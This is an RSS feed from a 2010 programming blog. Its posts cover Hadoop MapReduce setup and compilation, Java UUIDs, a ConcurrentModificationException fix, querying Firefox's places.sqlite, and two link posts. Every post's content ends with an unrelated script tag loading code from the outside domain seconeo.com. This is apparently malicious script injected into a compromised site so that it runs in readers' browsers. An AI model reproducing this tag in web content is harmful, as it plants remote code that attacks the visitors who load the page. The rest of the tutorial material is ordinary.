<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>random() &#187; programming</title>
	<atom:link href="http://blog.maxgarfinkel.com/archives/category/programming/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.maxgarfinkel.com</link>
	<description>All sorts, who knows?</description>
	<lastBuildDate>Thu, 19 Aug 2010 20:07:00 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>uuid</title>
		<link>http://blog.maxgarfinkel.com/archives/196</link>
		<comments>http://blog.maxgarfinkel.com/archives/196#comments</comments>
		<pubDate>Tue, 18 May 2010 22:40:41 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Hadoop]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/archives/196</guid>
		<description><![CDATA[I needed to create unique ids for urls I was processing in a map reduce job, an due to ignorance I just dumped the output to the local file system and then ran a single threaded job over the list to produce ids. Turns out I could have used uuid (universally unique id). The only [...]]]></description>
			<content:encoded><![CDATA[<p>I needed to create unique ids for urls I was processing in a map reduce job, an due to ignorance I just dumped the output to the local file system and then ran a single threaded job over the list to produce ids. Turns out I could have used uuid (universally unique id). The only advantage of my approach is that the ids are short.  <a href="http://java.sun.com/javase/6/docs/api/java/util/UUID.html">uuid docs</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/196/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Learning Hadoop</title>
		<link>http://blog.maxgarfinkel.com/archives/176</link>
		<comments>http://blog.maxgarfinkel.com/archives/176#comments</comments>
		<pubDate>Fri, 26 Feb 2010 20:34:32 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Hadoop]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=176</guid>
		<description><![CDATA[I have been trying to get my head round Hadoop, specifically Map-Reduce. I set everything up a while ago and had already started forgetting important things so this is an attempt to get down all the things I learned today before I forget them, in no particular order. Writing a map reduce program When I [...]]]></description>
			<content:encoded><![CDATA[<p>I have been trying to get my head round Hadoop, specifically Map-Reduce. I set everything up a while ago and had already started forgetting important things so this is an attempt to get down all the things I learned today before I forget them, in no particular order.</p>
<h2>Writing a map reduce program</h2>
<p>When I installed Hadoop barely a month ago it was at version 0.20.1, as of writing this, the stable release is 0.20.2.</p>
<p>Unfortunately the <a title="the official hadoop tutorial" href="http://hadoop.apache.org/common/docs/current/mapred_tutorial.html#Example%3A+WordCount+v1.0" target="_blank">official hadoop tutorial</a> at apache is already out of date and will show the use of depreciated calls. Thankfully <a title="word count tutorial for hadoop 0.20.1" href="http://cxwangyi.blogspot.com/2009/12/wordcount-tutorial-for-hadoop-0201.html" target="_blank">Yi Wang has updated it</a> for 0.20.1.</p>
<h3>Overview of a map reduce program</h3>
<p>In Yi and the apache tutorial the entire map reduce program is contained within a single outer class. Within this there are two inner classes, one for handling the map and one for handling the reduce stage. There is also a main in the container class, this main function seems to contain all the job configuration options. These seem to be:</p>
<div id="_mcePaste">
<ul>
<li>job.setJarByClass(UrlCollector.class);</li>
<li>job.setMapperClass(Map.class);</li>
<li>job.setReducerClass(Reducer.class);</li>
<li>job.setOutputKeyClass(Text.class);</li>
<li>job.setOutputValueClass(IntWritable.class);</li>
</ul>
</div>
<h4>The Mapper</h4>
<p>In these examples the mapper class is a public static inner class which extends the hadoop core Mapper object located in org.apache.hadoop.mapreduce.Mapper. This class is generic and so you pass it some type information at the class declaration</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000000; font-weight: bold;">static</span> <span style="color: #000000; font-weight: bold;">class</span> <span style="color: #003399;">Map</span> <span style="color: #000000; font-weight: bold;">extends</span> Mapper <span style="color: #339933;">&lt;</span>Object, Text, Text, IntWritable<span style="color: #339933;">&gt;</span><span style="color: #009900;">&#123;</span></pre></div></div>

<p>According to the javadoc the type parameters are: the input keys type, the input values type, the output keys type and the output values type.</p>
<p>The mapper class (Map) doesn&#8217;t have a constructor but simply overrides the Mapper method map</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">@Override
<span style="color: #000000; font-weight: bold;">public</span> <span style="color: #000066; font-weight: bold;">void</span> map<span style="color: #009900;">&#40;</span><span style="color: #003399;">Object</span> key, Text value, <span style="color: #003399;">Context</span> context<span style="color: #009900;">&#41;</span>
        <span style="color: #000000; font-weight: bold;">throws</span> <span style="color: #003399;">IOException</span>, <span style="color: #003399;">InterruptedException</span> <span style="color: #009900;">&#123;</span></pre></div></div>

<p>The Map.map() method takes a key and a value typed similarly to the Mapper&lt;ik,iv,ok,ov&gt;. It also takes an argument of type Context. The Context type is an inner class of Mappable and it seems to be where you pass back output key-values for passing on to the reduce stage. So in this example we are contracted to return a Text key and a IntWriteable value so the end section of  the map method would roughly look like this:</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">Text t <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> Text<span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
t.<span style="color: #006633;">set</span><span style="color: #009900;">&#40;</span><span style="color: #0000ff;">&quot;some-text-based-key&quot;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
IntWritable i <span style="color: #339933;">=</span> <span style="color: #000000; font-weight: bold;">new</span> IntWriteable<span style="color: #009900;">&#40;</span><span style="color: #cc66cc;">1</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
context.<span style="color: #006633;">write</span><span style="color: #009900;">&#40;</span>t, i<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span></pre></div></div>

<p>So to summarise: the mapper class extends Mapper and implements its own map method. The map method takes a key and a value as well as a context. You process your keys and values in whatever way your mapping phase requires and output the intermediate keys and values via the context object using the write(k,v) method.</p>
<h4>The Reducer</h4>
<p>Much the same as the mapper, the reducer is a public static inner class and it extends Reducer&lt;<em>keyin, valuein, keyout, valueout</em>&gt;. As you can see Reducer has its types parameterized too. The reducer class (our one) overrides Reducer.reduce(<em>Object, Iterable, Context</em>). Before attempting to explain any further I want to quickly backtrack to what will happen when this is run.</p>
<p>First up, of course, the mapper is called, does all its funky mapping and spits out a bunch of keys and values. So when all of the mappers have finished the mapping and there output is sorted on the key, the reducer phase gets to start. The framework then starts moving the mappers output over to the reducer. The will entail collecting up all the keys that are the same across the whole cluster and merge sorting them into a file for the reducer to ingest.</p>
<p><img class="alignnone size-full wp-image-180" title="Map Reduce Diagram" src="http://blog.maxgarfinkel.com/wp-uploads/2010/02/mapreduceDIagram.png" alt="A Map Reduce Diagram" width="500" height="330" /></p>
<p>In this example we have 3 possible key values <em>a, b </em>and <em>c</em>. After each mapper has run all the values keyed on <em>a </em>get copied to the green intermediary file, they are also sorted during this process so the green intermediary file ends up with all the <em>a </em>values in order. The same happens for the <em>b</em> values, which end up in the red file and <em>c </em>values which end up in the blue/green file at the bottom. In this case each reducer then just deals with one intermediary file <em>reducing</em> down all the <em>a </em>values into a final output file. To contextualise it, the word count example would fill the green file with a stack of keys and values that would all be <em>hello 1</em>. The reducer stage would pick up that file, run through it summing all the values for that key. Thus the output file would contain the key, <em>hello</em>, and the sum of the intermediary values <em>i.e. </em>the number of occurrences of  hello.</p>
<p>Given this brief detour we can now say a little more about the arguments for the reduce method. The first argument is the key, its type being the type we specified when extending Reduce&lt;<em>ik, iv, ok, ov</em>&gt;. The next argument is an Iterator type structure of the type we specified for the input values when extending the reduce. If we look back at the detour this should make a little more sense as what we are getting is a bunch of values that have a shared key. Thus the argument for this method gives us a key and the bunch of values associated with it. The final argument, like with the mapper, is a context object and this is what we write are reduced key, value pairs back to, to produce the final output.</p>
<h2>Compiling</h2>
<p>So I knocked up this code in <a title="Netbeans" href="http://netbeans.org/" target="_blank">netbeans</a> and hit clean and build, ran through all the steps I&#8217;m about to describe and simply didn&#8217;t work. I kept getting</p>
<p>Exception in thread&#8230;<br />
Caused by: java.util.zip.ZipException: error in opening zip file<br />
&#8230;</p>
<p>So the only lesson I could draw is that I need to compile it manually to get it to work. Before compiling the .java file I added some variables to my bash.rc file to make some of it a little easier:<br />
<a name="hadoop-bash-vars"></a></p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;"><span style="color: #666666; font-style: italic;">#hadoop path</span>
<span style="color: #7a0874; font-weight: bold;">export</span> <span style="color: #007800;">HADOOP_HOME</span>=<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>local<span style="color: #000000; font-weight: bold;">/</span>hadoop
<span style="color: #7a0874; font-weight: bold;">export</span> <span style="color: #007800;">HADOOP_VERSION</span>=0.20.1
<span style="color: #7a0874; font-weight: bold;">export</span> <span style="color: #007800;">PATH</span>=<span style="color: #007800;">$PATH</span>:<span style="color: #000000; font-weight: bold;">/</span>usr<span style="color: #000000; font-weight: bold;">/</span>local<span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>bin</pre></div></div>

<p>Now to compile the .java file for hadoop</p>
<ol>
<li>Copy the .java file over to my hadoop box (not running it locally yet)</li>
<li>In the same folder as .java file create a folder called classes (mkdir classes)</li>
<li>Then call the compiler</li>
</ol>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">javac <span style="color: #339933;">-</span>classpath $<span style="color: #009900;">&#123;</span>HADOOP_HOME<span style="color: #009900;">&#125;</span><span style="color: #339933;">/</span>hadoop<span style="color: #339933;">-</span>$<span style="color: #009900;">&#123;</span>HADOOP_VERSION<span style="color: #009900;">&#125;</span><span style="color: #339933;">-</span>core.<span style="color: #006633;">jar</span><span style="color: #339933;">:</span>commons<span style="color: #339933;">-</span>cli<span style="color: #339933;">-</span>1.2.<span style="color: #006633;">jar</span> <span style="color: #339933;">-</span>d classes UrlCollector.<span style="color: #006633;">java</span> <span style="color: #339933;">&amp;&amp;</span> jar <span style="color: #339933;">-</span>cvf urlcollector.<span style="color: #006633;">jar</span> <span style="color: #339933;">-</span>C classes<span style="color: #339933;">/</span> .</pre></div></div>

<p>So lets dissect this call bit by bit.</p>
<ul>
<li><strong>javac</strong> &#8211; thats the java compiler.</li>
<li><strong>-classpath</strong> &#8211; here we give it a path to the libraries, and here we use some of the variables we configured in the bash.rc file. we are using the variables to basically write out the path to hadoop core jar file, which on my machine is /usr/local/hadoop/hadoop-0.20.1-core.jar.</li>
<li><strong>:someOtherJar</strong> &#8211; we separate other libraries with a colon, in this case the apache commons cli library, which seems to be a dependancy, not sure about that yet though.</li>
<li><strong>-d</strong> <strong>classes</strong>- implies that we are providing a folder for all the class files to go in (remember step two?)</li>
<li><strong>UrlCollector.java </strong>- that was the name of the java file I needed to compile &#8211; the one containing the map and reduce functions as well as the main method.</li>
<li>Not totally sure about the rest except it seems to specify we want a jar and its name (<span style="font-family: Consolas, Monaco, 'Courier New', Courier, monospace; line-height: 18px; font-size: 12px; white-space: pre;"><strong>urlcollector.jar</strong><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; line-height: 19px; white-space: normal; font-size: 13px;">). But all importantly DO NOT forget the period (.) at the end. Without that seemingly insignificant little dot it wont work.</span></span></li>
</ul>
<p>Great so now we have a jar file that should work and we have some input files &#8211; in the case of the word count tutorial this is a couple of files with some words in them!</p>
<h2>Running the job</h2>
<p>So we have all our bits and pieces and we can now get ready to run this job. The first thing to note is that we must copy our input files into the hadoop file system but we leave our jar on the host file system. Now that we have <a href="#hadoop-bash-vars">set the path to the hadoop bin</a> we can call the hadoop command more easily. Lets copy up the source files</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">hadoop dfs <span style="color: #660033;">-copyFromLocal</span> <span style="color: #000000; font-weight: bold;">/</span>local<span style="color: #000000; font-weight: bold;">/</span>data <span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>fs<span style="color: #000000; font-weight: bold;">/</span>location<span style="color: #000000; font-weight: bold;">/</span></pre></div></div>

<p>Now we are ready for the magic, lets run the jar</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">hadoop jar urlcollector.jar com.maxgarfinkel.mapReduce.UrlCollector <span style="color: #000000; font-weight: bold;">/</span>user<span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>urlCol<span style="color: #000000; font-weight: bold;">/</span><span style="color: #000000; font-weight: bold;">in</span> <span style="color: #000000; font-weight: bold;">/</span>user<span style="color: #000000; font-weight: bold;">/</span>hadoop<span style="color: #000000; font-weight: bold;">/</span>urlCol<span style="color: #000000; font-weight: bold;">/</span>out</pre></div></div>

<p>Lets break this down.</p>
<ul>
<li><strong>hadoop jar </strong>- We call <em>jar</em> which is basically the <em>run this jar</em> command.</li>
<li><strong>urlcollector.jar </strong> &#8211; Thats the name of the jar I want to run (include the path if its not in your working directory)</li>
<li><strong>com.maxgarfinkel.mapReduce<span style="font-family: Consolas, Monaco, 'Courier New', Courier, monospace; font-weight: normal; line-height: 18px; font-size: 12px; white-space: pre;"><strong>.UrlCollector</strong><span style="font-family: Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; line-height: 19px; white-space: normal; font-size: 13px;"><strong> </strong>- That was the package name I had my UrlCollector.java class in and the class name.</span></span></strong></li>
<li><strong>/user/hadoop/urlCol/in </strong>- that is the hdfs path to the folder containing the input data we copied up in the previous step.</li>
<li><strong>/user/hadoop/urlCol/out</strong> &#8211; this is the hdfs path to the folder where I want the output to be put. I haven&#8217;t created this folder, I will let hadoop take care of that.</li>
</ul>
<p>So this is it written out in a more generic manner</p>

<div class="wp_syntax"><div class="code"><pre class="bash" style="font-family:monospace;">hadoop jar local<span style="color: #000000; font-weight: bold;">/</span>path<span style="color: #000000; font-weight: bold;">/</span>to<span style="color: #000000; font-weight: bold;">/</span>jar full.package.and.class.name hdfs<span style="color: #000000; font-weight: bold;">/</span>source<span style="color: #000000; font-weight: bold;">/</span>data<span style="color: #000000; font-weight: bold;">/</span>location hdfs<span style="color: #000000; font-weight: bold;">/</span>output<span style="color: #000000; font-weight: bold;">/</span>location</pre></div></div>

<p>So once our job has run we can pick up our output using the hadoop dfs command copyToLocal.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/176/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ConcurrentModificationException in a single thread</title>
		<link>http://blog.maxgarfinkel.com/archives/163</link>
		<comments>http://blog.maxgarfinkel.com/archives/163#comments</comments>
		<pubDate>Sun, 14 Feb 2010 17:16:54 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[learning Java]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=163</guid>
		<description><![CDATA[Today I came across a ConcurrentModificationException being thrown when no concurrent work was taking place. I learned (after a bit of hair tearing) that when you are looping over a list and you decide to remove something from it you will get this error. for&#40;Node n : nodes&#41;&#123; //do some stuff nodes.remove&#40;n&#41;;//This will throw the [...]]]></description>
			<content:encoded><![CDATA[<p>Today I came across a ConcurrentModificationException being thrown when no concurrent work was taking place. I learned (after a bit of hair tearing) that when you are looping over a list and you decide to remove something from it you will get this error.</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;"><span style="color: #000000; font-weight: bold;">for</span><span style="color: #009900;">&#40;</span>Node n <span style="color: #339933;">:</span> nodes<span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
    <span style="color: #666666; font-style: italic;">//do some stuff</span>
    nodes.<span style="color: #006633;">remove</span><span style="color: #009900;">&#40;</span>n<span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span><span style="color: #666666; font-style: italic;">//This will throw the error</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p>It makes perfect sense if you think about it. You are stepping over a list, no doubt under the hood somewhere a counter is being used. When you remove a element from a list, all the other elements are shuffled down so now your iterator is going to miss an element and shoot off the end of the list, so instead of that it fails fast and throws an exception. However, more importantly than why it happens, how can we stop it happening? Well we use a list iterator instead.</p>

<div class="wp_syntax"><div class="code"><pre class="java" style="font-family:monospace;">ListIterator<span style="color: #339933;">&lt;</span>Node<span style="color: #339933;">&gt;</span> i <span style="color: #339933;">=</span> nodes.<span style="color: #006633;">listIterator</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span>
<span style="color: #000000; font-weight: bold;">while</span><span style="color: #009900;">&#40;</span>li.<span style="color: #006633;">hasNext</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#41;</span><span style="color: #009900;">&#123;</span>
    Node n <span style="color: #339933;">=</span> i.<span style="color: #006633;">next</span><span style="color: #339933;">;</span>
    li.<span style="color: #006633;">remove</span><span style="color: #009900;">&#40;</span><span style="color: #009900;">&#41;</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">//No error if you remove the element through the iterator</span>
<span style="color: #009900;">&#125;</span></pre></div></div>

<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/163/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Firefox places.sqlite</title>
		<link>http://blog.maxgarfinkel.com/archives/151</link>
		<comments>http://blog.maxgarfinkel.com/archives/151#comments</comments>
		<pubDate>Wed, 27 Jan 2010 14:53:45 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Data visualisation]]></category>
		<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[Web programming]]></category>
		<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=151</guid>
		<description><![CDATA[Firefox stores your web browsing history in a sqlite db. On windows you can find it in:  Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\xyz.default\. On the mac it is in your home folder: Library/Application support/Mozilla/. There is a great addon for firefox called SQLite Manager which allows you to run SQLite queries. Using this you can look at [...]]]></description>
			<content:encoded><![CDATA[<p>Firefox stores your web browsing history in a sqlite db. On windows you can find it in:  <span style="color: #999999;">Documents and Settings\\Application Data\Mozilla\Firefox\Profiles\xyz.default\</span>. On the mac it is in your home folder: <span style="color: #999999;">Library/Application support/Mozilla/</span>.</p>
<p>There is a great addon for firefox called <a title="SQLite Manager" href="http://code.google.com/p/sqlite-manager/" target="_blank">SQLite Manager</a> which allows you to run SQLite queries. Using this you can look at the places.sqlite file, which contains your web history data. I am particulalry interested in looking at the paths I take and the following query will pull out pairs of target-&gt;referer pages.</p>

<div class="wp_syntax"><div class="code"><pre class="sql" style="font-family:monospace;"><span style="color: #993333; font-weight: bold;">SELECT</span> plc2<span style="color: #66cc66;">.</span>url <span style="color: #993333; font-weight: bold;">AS</span> <span style="color: #ff0000;">'referer'</span><span style="color: #66cc66;">,</span> plc1<span style="color: #66cc66;">.</span>url <span style="color: #993333; font-weight: bold;">AS</span> <span style="color: #ff0000;">'target'</span>
<span style="color: #993333; font-weight: bold;">FROM</span> moz_historyvisits vis<span style="color: #66cc66;">,</span> moz_historyvisits vis2
<span style="color: #993333; font-weight: bold;">INNER</span> <span style="color: #993333; font-weight: bold;">JOIN</span> moz_places plc1
<span style="color: #993333; font-weight: bold;">ON</span> plc1<span style="color: #66cc66;">.</span>id <span style="color: #66cc66;">=</span> vis<span style="color: #66cc66;">.</span>place_id
<span style="color: #993333; font-weight: bold;">INNER</span> <span style="color: #993333; font-weight: bold;">JOIN</span> moz_places plc2
<span style="color: #993333; font-weight: bold;">ON</span> plc2<span style="color: #66cc66;">.</span>id <span style="color: #66cc66;">=</span> vis2<span style="color: #66cc66;">.</span>place_id
<span style="color: #993333; font-weight: bold;">WHERE</span> vis<span style="color: #66cc66;">.</span>from_visit <span style="color: #66cc66;">=</span> vis2<span style="color: #66cc66;">.</span>id</pre></div></div>

<p>There is a wealth of information in this little file, the visit_type column, for example gives you an indicator of how the URL was reached.</p>
<table>
<tbody>
<tr>
<th>Type</th>
<th>ID</th>
<th>description</th>
</tr>
<tr>
<td>TRANSITION_LINK</td>
<td>1</td>
<td>This transition type means the user followed a link and got a new toplevel window.</td>
</tr>
<tr>
<td>TRANSITION_TYPED</td>
<td>2</td>
<td>This transition type is set when the user typed the URL to get to the page.</td>
</tr>
<tr>
<td>TRANSITION_BOOKMARK</td>
<td>3</td>
<td>This transition type is set when the user followed a bookmark to get to the page.</td>
</tr>
<tr>
<td>TRANSITION_EMBED</td>
<td>4</td>
<td>This transition type is set when some inner content is loaded. This is true of all images on a page, and the contents of the iframe. It is also true of any content in a frame, regardless if whether or not the user clicked something to get there.</td>
</tr>
<tr>
<td>TRANSITION_REDIRECT_PERMANENT</td>
<td>5</td>
<td>This transition type is set when the transition was a permanent redirect.</td>
</tr>
<tr>
<td>TRANSITION_REDIRECT_TEMPORARY</td>
<td>6</td>
<td>This transition type is set when the transition was a temporary redirect.</td>
</tr>
<tr>
<td>TRANSITION_DOWNLOAD</td>
<td>7</td>
<td>This transition type is set when the transition is a download.</td>
</tr>
</tbody>
</table>
<p>For more information on this you can view the <a title="Mozilla developer pages web history info" href="https://developer.mozilla.org/en/NsINavHistoryService" target="_blank">Mozilla dev pages</a> and the full <a title="Places api for firefox" href="https://developer.mozilla.org/en/Places" target="_blank">places system</a> within firefox is documented <a title="places api for firefox" href="https://developer.mozilla.org/en/Places" target="_blank">over here. </a></p>
<p>A wealth of further information on this DB is available over at <a title="Firefox places.sqlite information" href="http://www.firefoxforensics.com/research/index.shtml" target="_blank">firefox forensics</a><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/151/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hadoop cheat sheet</title>
		<link>http://blog.maxgarfinkel.com/archives/142</link>
		<comments>http://blog.maxgarfinkel.com/archives/142#comments</comments>
		<pubDate>Sun, 24 Jan 2010 18:39:25 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[Hadoop]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=142</guid>
		<description><![CDATA[Installing and configuring Hadoop Installing Hadoop on Ubuntu linux, an excellent tutorial by Michael  Noll. Installing Hadoop on Mac OS X , I tried this on snow leopard on a power book and it worked fine with the following caveats &#8211; Check it against Michaels tutorial and configure core-site.xml(referred to as hadoop-site.xml), mapred-site.xml, and hdfs-site.xml. [...]]]></description>
			<content:encoded><![CDATA[<h2>Installing and configuring Hadoop</h2>
<ul>
<li><a title="Installing Hadoop on Ubuntu" href="http://www.michael-noll.com/wiki/Running_Hadoop_On_Ubuntu_Linux_(Single-Node_Cluster)" target="_blank">Installing Hadoop on Ubuntu linux</a>, an excellent tutorial by Michael  Noll.</li>
<li><a title="Installing Hadoop on OS X" href="http://wiki.apache.org/hadoop/Running_Hadoop_On_OS_X_10.5_64-bit_%28Single-Node_Cluster%29" target="_blank">Installing Hadoop on Mac OS X</a> , I tried this on snow leopard on a power book and it worked fine with the following caveats &#8211; Check it against Michaels tutorial and configure core-site.xml(referred to as hadoop-site.xml), mapred-site.xml, and hdfs-site.xml. I forgot the last two and only hte data node and secondary name node started &#8211; remember you can use the jps command from the shell to see what java processes are running.</li>
</ul>
<h2>A list of useful hadoop related commands that I keep forgeting</h2>
<ul>
<li>Starting core as hadoop user: $&lt;HADOOP INSTALL DIR&gt;/bin/start-all.sh</li>
<li>Stopping core as hadoop user: $&lt;HADOOP INSTALL DIR&gt;/bin/stop-all.sh</li>
<li>Starting Zoopkeeper: $&lt;ZOOKEEPER INSTALL DIR&gt;/bin/zkServer.sh start</li>
<li>Stopping Zoopkeeper: $&lt;ZOOKEEPER INSTALL DIR&gt;/bin/zkServer.sh stop</li>
<li>Starting HBase: $&lt;HBASE INSTALL DIR&gt;/bin/start-hbase.sh</li>
<li>Stopping HBase: $&lt;HBASE INSTALL DIR&gt;/bin/stop-hbase.sh</li>
<li>Useful command to see what is running: $<a href="http://java.sun.com/j2se/1.5.0/docs/tooldocs/share/jps.html" target="_blank">jps</a></li>
<li><a href="http://java.sun.com/j2se/1.5.0/docs/tooldocs/share/jps.html" target="_blank"></a>(Re)format hdfs &lt;HADOOP INSTALL DIR&gt;/bin/hadoop namenode -format</li>
</ul>
<h2>Important paths</h2>
<ul>
<li>Hadoop install path: /usr/local/hadoop</li>
<li><a title="Hadoop web ui Job Tracker" href="http://localhost:50030/" target="_blank">web UI for MapReduce job tracker(s</a>)</li>
<li><a href="http://localhost:50060/" target="_blank">web UI for task tracker(s)</a></li>
<li><a href="http://localhost:50070/" target="_blank">Web UI HDFS Name Node</a></li>
</ul>
<h2><span style="font-family: 'Lucida Grande', Verdana, Arial, 'Bitstream Vera Sans', sans-serif;"><span style="white-space: pre-wrap;"> Hadoop class path</span></span></h2>
<p>Ran into problems today trying to run a jar in Hadoop that needed to reference the hbase jar and zookeeper jar. To get it to work I had to add some changes to the hadoop-env.sh. The changes were in the line</p>
<pre># Extra Java CLASSPATH elements.  Optional</pre>
<p>and the changes were</p>
<pre>export HADOOP_CLASSPATH=/usr/local/hbase/hbase-0.20.2.jar:/usr/local/zookeeper/zookeeper-3.2.2.jar</pre>
<p>which is basically adding the path to the hbase jar and the zookeeper jar</p>
<h2>Building a Hadoop compatible jar from netbeans</h2>
<p>Right &#8211; couldn&#8217;t build a jar that would work with hadoop from netbeans 6.7. After consulting the most knowledgeable java developer I know, we got to the bottom of it, sort of. It turns out the default manifest that netbeans creates seems to cause issues &#8211; all sorts of inexplicable errors infact. So the solution was to simply delete the <strong>manifest.mf</strong> from the root of the project. Phew. Might try and look into it further at some point, still working on a work flow based on netbeans.</p>
<h2>Important port numbers</h2>
<p>zookeeper client port = 2181</p>
<p>Hbase master port = 60000<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/142/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Multiple Fluid Simulation</title>
		<link>http://blog.maxgarfinkel.com/archives/120</link>
		<comments>http://blog.maxgarfinkel.com/archives/120#comments</comments>
		<pubDate>Thu, 01 Oct 2009 20:07:43 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=120</guid>
		<description><![CDATA[Multiple Fluid Simulation. An amazing simulation!]]></description>
			<content:encoded><![CDATA[<p><a href="http://kotsoft.googlepages.com/multiplefluid.html">Multiple Fluid Simulation</a>. An amazing simulation!<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/120/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Dictionary of Algorithms and Data Structures</title>
		<link>http://blog.maxgarfinkel.com/archives/118</link>
		<comments>http://blog.maxgarfinkel.com/archives/118#comments</comments>
		<pubDate>Thu, 01 Oct 2009 10:14:36 +0000</pubDate>
		<dc:creator>max</dc:creator>
				<category><![CDATA[programming]]></category>

		<guid isPermaLink="false">http://blog.maxgarfinkel.com/?p=118</guid>
		<description><![CDATA[Dictionary of Algorithms and Data Structures. Fantastic list of algorithmns and computer science problems. Very usefull]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.itl.nist.gov/div897/sqg/dads/">Dictionary of Algorithms and Data Structures</a>.</p>
<p>Fantastic list of algorithmns and computer science problems. Very usefull<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.maxgarfinkel.com/archives/118/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
